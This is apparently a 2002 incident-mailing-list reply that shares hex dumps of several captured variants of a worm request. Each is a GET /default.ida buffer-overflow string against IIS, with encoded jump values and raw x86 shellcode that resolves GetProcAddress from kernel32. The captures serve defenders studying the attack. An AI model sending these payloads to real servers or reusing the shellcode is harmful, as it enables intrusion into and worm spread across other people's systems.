RE: apache problem

From: Jonathan A. Zdziarski (jonathan@networkdweebs.com)
Date: 10/18/02


From: "Jonathan A. Zdziarski" <jonathan@networkdweebs.com>
To: <incidents@securityfocus.com>
Date: Thu, 17 Oct 2002 21:55:40 -0400

Actually there seem to be a few different variants going around; not
sure which one caused this apache problem but here are some of them at
least:

47 45 54 20 2F 64 65 66 61 75 6C 74 2E 69 64 61 3F | GET /default.ida?
4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E | NNNNNNNNNNNNNNNNN
4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E | NNNNNNNNNNNNNNNNN
4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E | NNNNNNNNNNNNNNNNN
4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E | NNNNNNNNNNNNNNNNN
4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E | NNNNNNNNNNNNNNNNN
4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E | NNNNNNNNNNNNNNNNN
4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E | NNNNNNNNNNNNNNNNN
4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E | NNNNNNNNNNNNNNNNN
4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E | NNNNNNNNNNNNNNNNN
4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E | NNNNNNNNNNNNNNNNN
4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E | NNNNNNNNNNNNNNNNN
4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E | NNNNNNNNNNNNNNNNN
4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E | NNNNNNNNNNNNNNNNN
4E 4E 4E 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | NNN..............
00 C3 03 00 00 00 78 00 FA 20 25 75 39 30 39 30 25 | ......x.. %u9090%
75 36 38 35 38 25 75 63 62 64 33 25 75 37 38 30 31 | u6858%ucbd3%u7801
25 75 39 30 39 30 25 75 36 38 35 38 25 75 63 62 64 | %u9090%u6858%ucbd
33 25 75 37 38 30 31 25 75 39 30 39 30 25 75 39 30 | 3%u7801%u9090%u90
39 30 25 75 38 31 39 30 25 75 30 30 63 33 25 75 30 | 90%u8190%u00c3%u0
30 30 33 25 75 38 62 30 30 25 75 35 33 31 62 25 75 | 003%u8b00%u531b%u
35 33 66 66 25 75 30 30 37 38 25 75 30 30 30 30 25 | 53ff%u0078%u0000%
75 30 30 3D 61 20 20 48 54 54 50 2F 31 2E 30 0D 0A | u00=a HTTP/1.0..
43 6F 6E 74 65 6E 74 2D 74 79 70 65 3A 20 74 65 78 | Content-type: tex
74 2F 78 6D 6C 0A 48 4F 53 54 3A 77 77 77 2E 77 6F | t/xml.HOST:www.wo
72 6D 2E 63 6F 6D 0A 20 41 63 63 65 70 74 3A 20 2A | rm.com. Accept: *
2F 2A 0A 43 6F 6E 74 65 6E 74 2D 6C 65 6E 67 74 68 | /*.Content-length
3A 20 33 35 36 39 20 0D 0A 0D 0A 55 8B EC 81 EC 18 | : 3569 ....U.....
02 00 00 53 56 57 8D BD E8 FD FF FF B9 86 00 00 00 | ...SVW...........
B8 CC CC CC CC F3 AB C7 85 70 FE FF FF 00 00 00 00 | .........p.......
E9 0A 0B 00 00 8F 85 68 FE FF FF 8D BD F0 FE FF FF | .......h.........
64 A1 00 00 00 00 89 47 08 64 89 3D 00 00 00 00 E9 | d......G.d.=.....
6F 0A 00 00 8F 85 60 FE FF FF C7 85 F0 FE FF FF FF | o.....`..........
FF FF FF 8B 85 68 FE FF FF 83 E8 07 89 85 F4 FE FF | .....h...........
FF C7 85 58 FE FF FF 00 00 E0 77 E8 9B 0A 00 00 83 | ...X......w......
BD 70 FE FF FF 00 0F 85 DD 01 00 00 8B 8D 58 FE FF | .p............X..
FF 81 C1 00 00 01 00 89 8D 58 FE FF FF 81 BD 58 FE | .........X.....X.
FF FF 00 00 00 78 75 0A C7 85 58 FE FF FF 00 00 F0 | .....xu...X......
BF 8B 95 58 FE FF FF 33 C0 66 8B 02 3D 4D 5A 00 00 | ...X...3.f..=MZ..
0F 85 9A 01 00 00 8B 8D 58 FE FF FF 8B 51 3C 8B 85 | ........X....Q<..
58 FE FF FF 33 C9 66 8B 0C 10 81 F9 50 45 00 00 0F | X...3.f.....PE...
85 79 01 00 00 8B 95 58 FE FF FF 8B 42 3C 8B 8D 58 | .y.....X....B<..X
FE FF FF 8B 54 01 78 03 95 58 FE FF FF 89 95 54 FE | ....T.x..X.....T.
FF FF 8B 85 54 FE FF FF 8B 48 0C 03 8D 58 FE FF FF | ....T....H...X...
89 8D 4C FE FF FF 8B 95 4C FE FF FF 81 3A 4B 45 52 | ..L.....L....:KER
4E 0F 85 33 01 00 00 8B 85 4C FE FF FF 81 78 04 45 | N..3.....L....x.E
4C 33 32 0F 85 20 01 00 00 8B 8D 58 FE FF FF 89 8D | L32.. .....X.....
34 FE FF FF 8B 95 54 FE FF FF 8B 85 58 FE FF FF 03 | 4.....T.....X....
42 20 89 85 4C FE FF FF C7 85 48 FE FF FF 00 00 00 | B ..L.....H......
00 EB 1E 8B 8D 48 FE FF FF 83 C1 01 89 8D 48 FE FF | .....H........H..
FF 8B 95 4C FE FF FF 83 C2 04 89 95 4C FE FF FF 8B | ...L........L....
85 54 FE FF FF 8B 8D 48 FE FF FF 3B 48 18 0F 8D C0 | .T.....H...;H....
00 00 00 8B 95 4C FE FF FF 8B 02 8B 8D 58 FE FF FF | .....L.......X...
81 3C 01 47 65 74 50 0F 85 A0 00 00 00 8B 95 4C FE | .<.GetP........L.
FF FF 8B 02 8B 8D 58 FE FF FF 81 7C 01 04 72 6F 63 | ......X....|..roc
41 0F 85 84 00 00 00 8B 95 48 FE FF FF 03 95 48 FE | A........H.....H.
FF FF 03 95 58 FE FF FF 8B 85 54 FE FF FF 8B 48 24 | ....X.....T....H$
33 C0 66 8B 04 0A 89 85 4C FE FF FF 8B 8D 54 FE FF | 3.f.....L.....T..
FF 8B 51 10 8B 85 4C FE FF FF 8D 4C 10 FF 89 8D 4C | ..Q...L....L....L
FE FF FF 8B 95 4C FE FF FF 03 95 4C FE FF FF 03 95 | .....L.....L.....
4C FE FF FF 03 95 4C FE FF FF 03 95 58 FE FF FF 8B | L.....L.....X....
85 54 FE FF FF 8B 48 1C 8B 14 0A 89 95 4C FE FF FF | .T....H......L...
8B 85 4C FE FF FF 03 85 58 FE FF FF 89 85 70 FE FF | ..L.....X.....p..
FF EB 05 E9 0D FF FF FF E9 16 FE FF FF 8D BD F0 FE | .................
FF FF 8B 47 08 64 A3 00 00 00 00 83 BD 70 FE FF FF | ...G.d.......p...
00 75 05 E9 38 08 00 00 C7 85 4C FE FF FF 01 00 00 | .u..8.....L......
00 EB 0F 8B 8D 4C FE FF FF 83 C1 01 89 8D 4C FE FF | .....L........L..
FF 8B 95 68 FE FF FF 0F BE 02 85 C0 0F 84 8D 00 00 | ...h.............
00 8B 8D 68 FE FF FF 0F BE 11 83 FA 09 75 21 8B 85 | ...h.........u!..
68 FE FF FF 83 C0 01 8B F4 50 FF 95 90 FE FF FF 3B | h........P......;
F4 90 43 4B 43 4B 89 85 34 FE FF FF EB 2A 8B F4 8B | ..CKCK..4....*...
8D 68 FE FF FF 51 8B 95 34 FE FF FF 52 FF 95 70 FE | .h...Q..4...R..p.
FF FF 3B F4 90 43 4B 43 4B 8B 8D 4C FE FF FF 89 84 | ..;..CKCK..L.....
8D 8C FE FF FF EB 0F 8B 95 68 FE FF FF 83 C2 01 89 | .........h.......
95 68 FE FF FF 8B 85 68 FE FF FF 0F BE 08 85 C9 74 | .h.....h........t
02 EB E2 8B 95 68 FE FF FF 83 C2 01 89 95 68 FE FF | .....h........h..
FF E9 53 FF FF FF 8B 85 68 FE FF FF 83 C0 01 89 85 | ..S.....h........
68 FE FF FF 8B 4D 08 8B 91 84 00 00 | h....M......

47 45 54 20 2F 64 65 66 61 75 6C 74 2E 69 64 61 3F | GET /default.ida?
4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E | NNNNNNNNNNNNNNNNN
4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E | NNNNNNNNNNNNNNNNN
4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E | NNNNNNNNNNNNNNNNN
4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E | NNNNNNNNNNNNNNNNN
4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E | NNNNNNNNNNNNNNNNN
4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E | NNNNNNNNNNNNNNNNN
4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E | NNNNNNNNNNNNNNNNN
4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E | NNNNNNNNNNNNNNNNN
4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E | NNNNNNNNNNNNNNNNN
4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E | NNNNNNNNNNNNNNNNN
4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E | NNNNNNNNNNNNNNNNN
4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E | NNNNNNNNNNNNNNNNN
4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E | NNNNNNNNNNNNNNNNN
4E 4E 4E 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | NNN..............
00 C3 03 00 00 00 78 00 FA 20 25 75 39 30 39 30 25 | ......x.. %u9090%
75 36 38 35 38 25 75 63 62 64 33 25 75 37 38 30 31 | u6858%ucbd3%u7801
25 75 39 30 39 30 25 75 36 38 35 38 25 75 63 62 64 | %u9090%u6858%ucbd
33 25 75 37 38 30 31 25 75 39 30 39 30 25 75 39 30 | 3%u7801%u9090%u90
39 30 25 75 38 31 39 30 25 75 30 30 63 33 25 75 30 | 90%u8190%u00c3%u0
30 30 33 25 75 38 62 30 30 25 75 35 33 31 62 25 75 | 003%u8b00%u531b%u
35 33 66 66 25 75 30 30 37 38 25 75 30 30 30 30 25 | 53ff%u0078%u0000%
75 30 30 3D 61 20 20 48 54 54 50 2F 31 2E 30 0D 0A | u00=a HTTP/1.0..
43 6F 6E 74 65 6E 74 2D 74 79 70 65 3A 20 74 65 78 | Content-type: tex
74 2F 78 6D 6C 0A 48 4F 53 54 3A 77 77 77 2E 77 6F | t/xml.HOST:www.wo
72 6D 2E 63 6F 6D 0A 20 41 63 63 65 70 74 3A 20 2A | rm.com. Accept: *
2F 2A 0A 43 6F 6E 74 65 6E 74 2D 6C 65 6E 67 74 68 | /*.Content-length
3A 20 33 35 36 39 20 0D 0A 0D 0A 55 8B EC 81 EC 18 | : 3569 ....U.....
02 00 00 53 56 57 8D BD E8 FD FF FF B9 86 00 00 00 | ...SVW...........
B8 CC CC CC CC F3 AB C7 85 70 FE FF FF 00 00 00 00 | .........p.......
E9 0A 0B 00 00 8F 85 68 FE FF FF 8D BD F0 FE FF FF | .......h.........
64 A1 00 00 00 00 89 47 08 64 89 3D 00 00 00 00 E9 | d......G.d.=.....
6F 0A 00 00 8F 85 60 FE FF FF C7 85 F0 FE FF FF FF | o.....`..........
FF FF FF 8B 85 68 FE FF FF 83 E8 07 89 85 F4 FE FF | .....h...........
FF C7 85 58 FE FF FF 00 00 E0 77 E8 9B 0A 00 00 83 | ...X......w......
BD 70 FE FF FF 00 0F 85 DD 01 00 00 8B 8D 58 FE FF | .p............X..
FF 81 C1 00 00 01 00 89 8D 58 FE FF FF 81 BD 58 FE | .........X.....X.
FF FF 00 00 00 78 75 0A C7 85 58 FE FF FF 00 00 F0 | .....xu...X......
BF 8B 95 58 FE FF FF 33 C0 66 8B 02 3D 4D 5A 00 00 | ...X...3.f..=MZ..
0F 85 9A 01 00 00 8B 8D 58 FE FF FF 8B 51 3C 8B 85 | ........X....Q<..
58 FE FF FF 33 C9 66 8B 0C 10 81 F9 50 45 00 00 0F | X...3.f.....PE...
85 79 01 00 00 8B 95 58 FE FF FF 8B 42 3C 8B 8D 58 | .y.....X....B<..X
FE FF FF 8B 54 01 78 03 95 58 FE FF FF 89 95 54 FE | ....T.x..X.....T.
FF FF 8B 85 54 FE FF FF 8B 48 0C 03 8D 58 FE FF FF | ....T....H...X...
89 8D 4C FE FF FF 8B 95 4C FE FF FF 81 3A 4B 45 52 | ..L.....L....:KER
4E 0F 85 33 01 00 00 8B 85 4C FE FF FF 81 78 04 45 | N..3.....L....x.E
4C 33 32 0F 85 20 01 00 00 8B 8D 58 FE FF FF 89 8D | L32.. .....X.....
34 FE FF FF 8B 95 54 FE FF FF 8B 85 58 FE FF FF 03 | 4.....T.....X....
42 20 89 85 4C FE FF FF C7 85 48 FE FF FF 00 00 00 | B ..L.....H......
00 EB 1E 8B 8D 48 FE FF FF 83 C1 01 89 8D 48 FE FF | .....H........H..
FF 8B 95 4C FE FF FF 83 C2 04 89 95 4C FE FF FF 8B | ...L........L....
85 54 FE FF FF 8B 8D 48 FE FF FF 3B 48 18 0F 8D C0 | .T.....H...;H....
00 00 00 8B 95 4C FE FF FF 8B 02 8B 8D 58 FE FF FF | .....L.......X...
81 3C 01 47 65 74 50 0F 85 A0 00 00 00 8B 95 4C FE | .<.GetP........L.
FF FF 8B 02 8B 8D 58 FE FF FF 81 7C 01 04 72 6F 63 | ......X....|..roc
41 0F 85 84 00 00 00 8B 95 48 FE FF FF 03 95 48 FE | A........H.....H.
FF FF 03 95 58 FE FF FF 8B 85 54 FE FF FF 8B 48 24 | ....X.....T....H$
33 C0 66 8B 04 0A 89 85 4C FE FF FF 8B 8D 54 FE FF | 3.f.....L.....T..
FF 8B 51 10 8B 85 4C FE FF FF 8D 4C 10 FF 89 8D 4C | ..Q...L....L....L
FE FF FF 8B 95 4C FE FF FF 03 95 4C FE FF FF 03 95 | .....L.....L.....
4C FE FF FF 03 95 4C FE FF FF 03 95 58 FE FF FF 8B | L.....L.....X....
85 54 FE FF FF 8B 48 1C 8B 14 0A 89 95 4C FE FF FF | .T....H......L...
8B 85 4C FE FF FF 03 85 58 FE FF FF 89 85 70 FE FF | ..L.....X.....p..
FF EB 05 E9 0D FF FF FF E9 16 FE FF FF 8D BD F0 FE | .................
FF FF 8B 47 08 64 A3 00 00 00 00 83 BD 70 FE FF FF | ...G.d.......p...
00 75 05 E9 38 08 00 00 C7 85 4C FE FF FF 01 00 00 | .u..8.....L......
00 EB 0F 8B 8D 4C FE FF FF 83 C1 01 89 8D 4C FE FF | .....L........L..
FF 8B 95 68 FE FF FF 0F BE 02 85 C0 0F 84 8D 00 00 | ...h.............
00 8B 8D 68 FE FF FF 0F BE 11 83 FA 09 75 21 8B 85 | ...h.........u!..
68 FE FF FF 83 C0 01 8B F4 50 FF 95 90 FE FF FF 3B | h........P......;
F4 90 43 4B 43 4B 89 85 34 FE FF FF EB 2A 8B F4 8B | ..CKCK..4....*...
8D 68 FE FF FF 51 8B 95 34 FE FF FF 52 FF 95 70 FE | .h...Q..4...R..p.
FF FF 3B F4 90 43 4B 43 4B 8B 8D 4C FE FF FF 89 84 | ..;..CKCK..L.....
8D 8C FE FF FF EB 0F 8B 95 68 FE FF FF 83 C2 01 89 | .........h.......
95 68 FE FF FF 8B 85 68 FE FF FF 0F BE 08 85 C9 74 | .h.....h........t
02 EB E2 8B 95 68 FE FF FF 83 C2 01 89 95 68 FE FF | .....h........h..
FF E9 53 FF FF FF 8B 85 68 FE FF | ..S.....h..

47 45 54 20 2F 64 65 66 61 75 6C 74 2E 69 64 61 3F | GET /default.ida?
4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E | NNNNNNNNNNNNNNNNN
4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E | NNNNNNNNNNNNNNNNN
4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E | NNNNNNNNNNNNNNNNN
4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E | NNNNNNNNNNNNNNNNN
4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E | NNNNNNNNNNNNNNNNN
4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E | NNNNNNNNNNNNNNNNN
4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E | NNNNNNNNNNNNNNNNN
4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E | NNNNNNNNNNNNNNNNN
4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E | NNNNNNNNNNNNNNNNN
4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E | NNNNNNNNNNNNNNNNN
4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E | NNNNNNNNNNNNNNNNN
4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E | NNNNNNNNNNNNNNNNN
4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E | NNNNNNNNNNNNNNNNN
4E 4E 4E 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | NNN..............
00 C3 03 00 00 00 78 00 FA 20 25 75 39 30 39 30 25 | ......x.. %u9090%
75 36 38 35 38 25 75 63 62 64 33 25 75 37 38 30 31 | u6858%ucbd3%u7801
25 75 39 30 39 30 25 75 36 38 35 38 25 75 63 62 64 | %u9090%u6858%ucbd
33 25 75 37 38 30 31 25 75 39 30 39 30 25 75 39 30 | 3%u7801%u9090%u90
39 30 25 75 38 31 39 30 25 75 30 30 63 33 25 75 30 | 90%u8190%u00c3%u0
30 30 33 25 75 38 62 30 30 25 75 35 33 31 62 25 75 | 003%u8b00%u531b%u
35 33 66 66 25 75 30 30 37 38 25 75 30 30 30 30 25 | 53ff%u0078%u0000%
75 30 30 3D 61 20 20 48 54 54 50 2F 31 2E 30 0D 0A | u00=a HTTP/1.0..
43 6F 6E 74 65 6E 74 2D 74 79 70 65 3A 20 74 65 78 | Content-type: tex
74 2F 78 6D 6C 0A 48 4F 53 54 3A 77 77 77 2E 77 6F | t/xml.HOST:www.wo
72 6D 2E 63 6F 6D 0A 20 41 63 63 65 70 74 3A 20 2A | rm.com. Accept: *
2F 2A 0A 43 6F 6E 74 65 6E 74 2D 6C 65 6E 67 74 68 | /*.Content-length
3A 20 33 35 36 39 20 0D 0A 0D 0A 55 8B EC 81 EC 18 | : 3569 ....U.....
02 00 00 53 56 57 8D BD E8 FD FF FF B9 86 00 00 00 | ...SVW...........
B8 CC CC CC CC F3 AB C7 85 70 FE FF FF 00 00 00 00 | .........p.......
E9 0A 0B 00 00 8F 85 68 FE FF FF 8D BD F0 FE FF FF | .......h.........
64 A1 00 00 00 00 89 47 08 64 89 3D 00 00 00 00 E9 | d......G.d.=.....
6F 0A 00 00 8F 85 60 FE FF FF C7 85 F0 FE FF FF FF | o.....`..........
FF FF FF 8B 85 68 FE FF FF 83 E8 07 89 85 F4 FE FF | .....h...........
FF C7 85 58 FE FF FF 00 00 E0 77 E8 9B 0A 00 00 83 | ...X......w......
BD 70 FE FF FF 00 0F 85 DD 01 00 00 8B 8D 58 FE FF | .p............X..
FF 81 C1 00 00 01 00 89 8D 58 FE FF FF 81 BD 58 FE | .........X.....X.
FF FF 00 00 00 78 75 0A C7 85 58 FE FF FF 00 00 F0 | .....xu...X......
BF 8B 95 58 FE FF FF 33 C0 66 8B 02 3D 4D 5A 00 00 | ...X...3.f..=MZ..
0F 85 9A 01 00 00 8B 8D 58 FE FF FF 8B 51 3C 8B 85 | ........X....Q<..
58 FE FF FF 33 C9 66 8B 0C 10 81 F9 50 45 00 00 0F | X...3.f.....PE...
85 79 01 00 00 8B 95 58 FE FF FF 8B 42 3C 8B 8D 58 | .y.....X....B<..X
FE FF FF 8B 54 01 78 03 95 58 FE FF FF 89 95 54 FE | ....T.x..X.....T.
FF FF 8B 85 54 FE FF FF 8B 48 0C 03 8D 58 FE FF FF | ....T....H...X...
89 8D 4C FE FF FF 8B 95 4C FE FF FF 81 3A 4B 45 52 | ..L.....L....:KER
4E 0F 85 33 01 00 00 8B 85 4C FE FF FF 81 78 04 45 | N..3.....L....x.E
4C 33 32 0F 85 20 01 00 00 8B 8D 58 FE FF FF 89 8D | L32.. .....X.....
34 FE FF FF 8B 95 54 FE FF FF 8B 85 58 FE FF FF 03 | 4.....T.....X....
42 20 89 85 4C FE FF FF C7 85 48 FE FF FF 00 00 00 | B ..L.....H......
00 EB 1E 8B 8D 48 FE FF FF 83 C1 01 89 8D 48 FE FF | .....H........H..
FF 8B 95 4C FE FF FF 83 C2 04 89 95 4C FE FF FF 8B | ...L........L....
85 54 FE FF FF 8B 8D 48 FE FF FF 3B 48 18 0F 8D C0 | .T.....H...;H....
00 00 00 8B 95 4C FE FF FF 8B 02 8B 8D 58 FE FF FF | .....L.......X...
81 3C 01 47 65 74 50 0F 85 A0 00 00 00 8B 95 4C FE | .<.GetP........L.
FF FF 8B 02 8B 8D 58 FE FF FF 81 7C 01 04 72 6F 63 | ......X....|..roc
41 0F 85 84 00 00 00 8B 95 48 FE FF FF 03 95 48 FE | A........H.....H.
FF FF 03 95 58 FE FF FF 8B 85 54 FE FF FF 8B 48 24 | ....X.....T....H$
33 C0 66 8B 04 0A 89 85 4C FE FF FF 8B 8D 54 FE FF | 3.f.....L.....T..
FF 8B 51 10 8B 85 4C FE FF FF 8D 4C 10 FF 89 8D 4C | ..Q...L....L....L
FE FF FF 8B 95 4C FE FF FF 03 95 4C FE FF FF 03 95 | .....L.....L.....
4C FE FF FF 03 95 4C FE FF FF 03 95 58 FE FF FF 8B | L.....L.....X....
85 54 FE FF FF 8B 48 1C 8B 14 0A 89 95 4C FE FF FF | .T....H......L...
8B 85 4C FE FF FF 03 85 58 FE FF FF 89 85 70 FE FF | ..L.....X.....p..
FF EB 05 E9 0D FF FF FF E9 16 FE FF FF 8D BD F0 FE | .................
FF FF 8B 47 08 64 A3 00 00 00 00 83 BD 70 FE FF FF | ...G.d.......p...
00 75 05 E9 38 08 00 00 C7 85 4C FE FF FF 01 00 00 | .u..8.....L......
00 EB 0F 8B 8D 4C FE FF FF 83 C1 01 89 8D 4C FE FF | .....L........L..
FF 8B 95 68 FE FF FF 0F BE 02 85 C0 0F 84 8D 00 00 | ...h.............
00 8B 8D 68 FE FF FF 0F BE 11 83 FA 09 75 21 8B 85 | ...h.........u!..
68 FE FF FF 83 C0 01 8B F4 50 FF 95 90 FE FF FF 3B | h........P......;
F4 90 43 4B 43 4B 89 85 34 FE FF FF EB 2A 8B F4 8B | ..CKCK..4....*...
8D 68 FE FF FF 51 8B 95 34 FE FF FF 52 FF 95 70 FE | .h...Q..4...R..p.
FF FF 3B F4 90 43 4B 43 4B 8B 8D 4C FE FF FF 89 84 | ..;..CKCK..L.....
8D 8C FE FF FF EB 0F 8B 95 68 FE FF FF 83 C2 01 89 | .........h.......
95 68 FE FF FF 8B 85 68 FE FF FF 0F BE 08 85 C9 74 | .h.....h........t
02 EB E2 8B 95 68 FE FF FF 83 C2 01 89 95 68 FE FF | .....h........h..
FF E9 53 FF FF FF 8B 85 68 FE FF FF 83 C0 01 89 85 | ..S.....h........
68 FE FF FF 8B 4D 08 8B 91 84 00 00 00 89 95 6C FE | h....M.........l.
FF FF C7 85 4C FE FF FF 04 00 00 00 C6 85 D0 FE FF | ....L............
FF 68 8B 45 08 89 | .h.E..

47 45 54 20 2F 64 65 66 61 75 6C 74 2E 69 64 61 3F | GET /default.ida?
4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E | NNNNNNNNNNNNNNNNN
4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E | NNNNNNNNNNNNNNNNN
4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E | NNNNNNNNNNNNNNNNN
4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E | NNNNNNNNNNNNNNNNN
4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E | NNNNNNNNNNNNNNNNN
4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E | NNNNNNNNNNNNNNNNN
4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E | NNNNNNNNNNNNNNNNN
4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E | NNNNNNNNNNNNNNNNN
4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E | NNNNNNNNNNNNNNNNN
4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E | NNNNNNNNNNNNNNNNN
4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E | NNNNNNNNNNNNNNNNN
4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E | NNNNNNNNNNNNNNNNN
4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E | NNNNNNNNNNNNNNNNN
4E 4E 4E 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | NNN..............
00 C3 03 00 00 00 78 00 FA 20 25 75 39 30 39 30 25 | ......x.. %u9090%
75 36 38 35 38 25 75 63 62 64 33 25 75 37 38 30 31 | u6858%ucbd3%u7801
25 75 39 30 39 30 25 75 36 38 35 38 25 75 63 62 64 | %u9090%u6858%ucbd
33 25 75 37 38 30 31 25 75 39 30 39 30 25 75 39 30 | 3%u7801%u9090%u90
39 30 25 75 38 31 39 30 25 75 30 30 63 33 25 75 30 | 90%u8190%u00c3%u0
30 30 33 25 75 38 62 30 30 25 75 35 33 31 62 25 75 | 003%u8b00%u531b%u
35 33 66 66 25 75 30 30 37 38 25 75 30 30 30 30 25 | 53ff%u0078%u0000%
75 30 30 3D 61 20 20 48 54 54 50 2F 31 2E 30 0D 0A | u00=a HTTP/1.0..
43 6F 6E 74 65 6E 74 2D 74 79 70 65 3A 20 74 65 78 | Content-type: tex
74 2F 78 6D 6C 0A 48 4F 53 54 3A 77 77 77 2E 77 6F | t/xml.HOST:www.wo
72 6D 2E 63 6F 6D 0A 20 41 63 63 65 70 74 3A 20 2A | rm.com. Accept: *
2F 2A 0A 43 6F 6E 74 65 6E 74 2D 6C 65 6E 67 74 68 | /*.Content-length
3A 20 33 35 36 39 20 0D 0A 0D 0A 55 8B EC 81 EC 18 | : 3569 ....U.....
02 00 00 53 56 57 8D BD E8 FD FF FF B9 86 00 00 00 | ...SVW...........
B8 CC CC CC CC F3 AB C7 85 70 FE FF FF 00 00 00 00 | .........p.......
E9 0A 0B 00 00 8F 85 68 FE FF FF 8D BD F0 FE FF FF | .......h.........
64 A1 00 00 00 00 89 47 08 64 89 3D 00 00 00 00 E9 | d......G.d.=.....
6F 0A 00 00 8F 85 60 FE FF FF C7 85 F0 FE FF FF FF | o.....`..........
FF FF FF 8B 85 68 FE FF FF 83 E8 07 89 85 F4 FE FF | .....h...........
FF C7 85 58 FE FF FF 00 00 E0 77 E8 9B 0A 00 00 83 | ...X......w......
BD 70 FE FF FF 00 0F 85 DD 01 00 00 8B 8D 58 FE FF | .p............X..
FF 81 C1 00 00 01 00 89 8D 58 FE FF FF 81 BD 58 FE | .........X.....X.
FF FF 00 00 00 78 75 0A C7 85 58 FE FF FF 00 00 F0 | .....xu...X......
BF 8B 95 58 FE FF FF 33 C0 66 8B 02 3D 4D 5A 00 00 | ...X...3.f..=MZ..
0F 85 9A 01 00 00 8B 8D 58 FE FF FF 8B 51 3C 8B 85 | ........X....Q<..
58 FE FF FF 33 C9 66 8B 0C 10 81 F9 50 45 00 00 0F | X...3.f.....PE...
85 79 01 00 00 8B 95 58 FE FF FF 8B 42 3C 8B 8D 58 | .y.....X....B<..X
FE FF FF 8B 54 01 78 03 95 58 FE FF FF 89 95 54 FE | ....T.x..X.....T.
FF FF 8B 85 54 FE FF FF 8B 48 0C 03 8D 58 FE FF FF | ....T....H...X...
89 8D 4C FE FF FF 8B 95 4C FE FF FF 81 3A 4B 45 52 | ..L.....L....:KER
4E 0F 85 33 01 00 00 8B 85 4C FE FF FF 81 78 04 45 | N..3.....L....x.E
